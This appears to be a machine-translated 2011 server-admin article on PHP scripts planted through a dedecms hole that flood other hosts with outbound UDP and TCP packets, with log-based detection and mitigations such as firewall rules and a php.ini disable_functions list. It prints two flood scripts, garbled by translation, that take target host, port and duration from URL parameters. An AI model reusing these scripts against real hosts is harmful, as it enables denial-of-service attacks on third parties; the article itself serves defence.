The ultimate solution to the server crash caused by PHP external contract sharing

The ultimate solution to the server crash caused by PHP external contract sharing

The ultimate solution to the server crash caused by PHP external contract sharing
December 28, 2011
Summarize dedecms PHP external contract to cause server crashes the ultimate solution, hope can help customers solve the server problem, make the website run better
First, PHP external contract analysis
Use PHP code to call sockets, directly with the server network attack other IP, the common code is as follows:
Here is the code snippet:
$packets = 0;
$ip = $_get[\ ' ip\ ');
$rand = $_get[\ ' port\ ');
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[\ ' time\ ');
$time = time ();
Print \ ' flooded: $ip on port $rand
\';
$max _time = $time + $exec _time;
for ($i =0; $i $max _time) {
Break
}
$fp = Fsockopen (\ ' udp://$ip \ ', $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo \ ' Packet complete at \ '. Time (\ ' h:i:s\ '). \ ' With
$packets (\ '. Round ($packets *65)/1024, 2). \ ' MB ' packets averaging \ '.
Round ($packets/$exec _time, 2). \ ' packets/s \\n\ ';
?>
Ii. Characteristics of performance
When IIS is turned on, the outgoing bandwidth of the server is exhausted-----that is, the server is constantly contracting to others, which is different from DDoS attacks, which are constantly receiving a large number of packets from the server.
This problem has been caused by a large number of servers recently due to dedecms vulnerabilities.
How to find these stations quickly?
You can open the log
C:\Windows\System32\LogFiles\HTTPERR\httperr...log, open the file for today's time,
There's a record like this:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 http/1.1 get/xxxx/xxxxxx.php?host=122.224.32.100&port= 445&TIME=120 503 783 Disabled 30_freehost_1
Last three items 783 Disabled 30_freehost_1
783 is the ID of this station in IIS
30_freehost_1 is the pool.
Iii. Solutions
1. Click the above to locate the site and stop it. Or stop the pool and restart IIS.
2. In the IP policy, or firewall, disable all UDP outgoing
In order to solve this problem, you can also adjust the IP policy, restrict UDP to access only specific DNS server IP, such as 8.8.8.8, unless hackers attack this IP, otherwise the attack is not valid, you can set up in the network card DNS you only know the DNS IP, and do not expose, The UDP open part of the IP policy is then called to resolve. (Open IP Policy Properties, double-click Open, the Open two UDP records delete any one, in the left of this, double-click, change the address from the source address to the destination address of a specific IP is set to your own DNS IP, such as 8.8.8.8 ' saved on the line)
3. With first-class information monitoring, in the SQL interception and URL interception, intercept port= this keyword (other keywords can be deleted.)
4. You can also directly prohibit the above code, such as change Win\php.ini after the restart of IIS
Ignore_user_abort = On
(Note the previous; number to be removed)
Disable_functions =EXEC,SYSTEM,PASSTHRU,POPEN,PCLOSE,SHELL_EXEC,PROC_OPEN,CURL_EXEC,MULTI_EXEC,DL,CHMOD,STREAM_ Socket_server,popepassthru,pfsockopen,gzinflate,
Add in the back
Fsockopen,set_time_limit
But this will cause a lot of PHP programs are not normal.
In addition, it also indicates that your server is doing a good job, if it can invade. Hackers directly to the right, but also dos do?
Recently there are new TCP-based attack Phpddos codes as follows:
Here is the code snippet:
Set_time_limit (999999);
$host = $_get[' host '];
$port = $_get[' Port '];
$exec _time = $_get[' time ');
$packets = 64;
Ignore_user_abort (True);
if (StrLen ($host) ==0 or StrLen ($port) ==0 or StrLen ($exec _time) ==0) {
if (StrLen ($_get[' rat ']) 0) {
echo $_get[' rat '].$_server[' http_host '. gethostbyname ($_server[' server_name ').
Php_uname (). ' | '. $_server[' server_software '].$_get[' rat ';
Exit
}
Exit
}
$max _time = time () + $exec _time;
while (1) {
$packets + +;
if (Time () > $max _time or $exec _time! = 69) {
Break
}
$fp = Fsockopen (' tcp://$host ', $port, $errno, $errstr, 0);
}
?>
Similarly, the following solutions can be adopted:
1. You can also directly prohibit the above code, such as change Win\php.ini after the restart of IIS
Ignore_user_abort = On
(Note the previous; number to be removed)
Disable_functions =EXEC,SYSTEM,PASSTHRU,POPEN,PCLOSE,SHELL_EXEC,PROC_OPEN,CURL_EXEC,MULTI_EXEC,DL,CHMOD,STREAM_ Socket_server,popepassthru,pfsockopen,gzinflate,
Add in the back
Fsockopen,set_time_limit
But this will cause a lot of PHP programs are not normal. If you are IDC, providing space for customers, disabling the function may cause the client program to not run, so generally do not use this method
2. All outbound TCP packets are banned in the IP policy, but this can result in invalid acquisition functionality and cannot be used on the master server.
3. In the server to use the keyword TCP: or udp: Search all PHP class files, find the attack file, delete it.

